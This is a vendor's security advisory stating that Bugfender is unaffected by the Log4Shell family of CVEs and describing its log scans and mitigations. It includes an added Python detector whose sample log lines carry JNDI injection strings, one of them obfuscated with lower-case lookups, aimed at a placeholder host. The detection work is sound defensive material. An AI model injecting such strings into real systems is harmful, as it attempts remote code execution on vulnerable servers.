TL;DR: Good news. Bugfender is not vulnerable to CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, or CVE-2021-44832, so there is nothing to worry about. This applies to both the Bugfender SaaS and On-Premises editions.
However, we wanted to share with you the analysis and steps we took to make that statement.
First of all, the Bugfender software is not using log4j, so it is not susceptible to CVE-2021-44228 (edit: or the other mentioned CVEs). However, our infrastructure contains many components, including databases, monitoring tools, security tools, etc., that use various technologies and libraries. Some of them could be using log4j, so we needed to analyze further.
Our servers are equipped with proactive monitoring and alerting tools that look for intrusion attempts and signs of compromise, such as malware installation, unusual operator activity, changes to essential parts of the systems, etc. Those tools have not indicated that anything out of the ordinary happened.
Last Friday, once we learned about CVE-2021-44228, we also scanned all of our systems’ logs for strings that could indicate exploitation attempts (like “${jndi:ldap”, “${jndi:rmi” and similar), and we could not find anything unusual. We have kept doing this over the weekend and until today, so we can conclude with a high degree of certainty that it is very unlikely we have been breached.
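As an added illustration of the log scan described above (example code, not Bugfender's own tooling), the following script flags lines containing a `${jndi:` lookup. It goes slightly beyond the two literal strings mentioned: it also collapses the `${lower:x}`/`${upper:x}` wrappers commonly used to hide the `jndi` token, so that such variants are not missed. The log lines are constructed samples, not real Bugfender logs.

```python
import re

# Constructed sample log lines (not from any real system). The first two
# carry lookup strings of the kind described above; the third is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.6 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 ${${lower:j}ndi:rmi://example.invalid/b}"
10.0.0.7 - - [10/Dec/2021:14:02:13 +0000] "GET /healthz HTTP/1.1" 200 17 "-" "curl/7.68.0"
"""

# Single-letter case-changing lookups such as ${lower:J} that split up the
# literal "jndi" token; each is replaced by its plain letter.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([A-Za-z])\}", re.IGNORECASE)
# After normalisation, any "${jndi:<scheme>" is what a defender wants to see.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalise(line: str) -> str:
    """Collapse ${lower:x}/${upper:x} wrappers until none remain, then lowercase."""
    prev = None
    while prev != line:
        prev = line
        line = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), line)
    return line.lower()


def find_jndi_lookups(text: str) -> list[tuple[int, str]]:
    """Return (line number, URI scheme) for every line containing a JNDI lookup."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = _JNDI.search(normalise(line))
        if m:
            hits.append((n, m.group(1)))
    return hits


if __name__ == "__main__":
    for n, scheme in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {scheme}")
```

A hit is only evidence of an attempt, not of successful exploitation; the affected host still needs the outbound-connection and process checks mentioned above.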
Besides checking for signs of compromise, we located all components using log4j and applied the temporary mitigation proposed by the log4j team for disabling lookups. Once these components receive security updates from their respective vendors, we will also apply them as part of our regular, ongoing security patching.
Please note that the mitigations we applied are purely preventive, following best practices for defense in depth. We have no evidence that Bugfender has been vulnerable at any time.
If you’d like to learn more about Bugfender’s security practices, we invite you to visit our Security page. If you have any questions, please feel free to contact us.
Edit (2021-12-16): post updated to also reflect CVE-2021-45046 impact.
Edit (2021-12-20): post updated to also reflect CVE-2021-45105 impact.
Edit (2022-01-06): post updated to also reflect CVE-2021-44832 impact.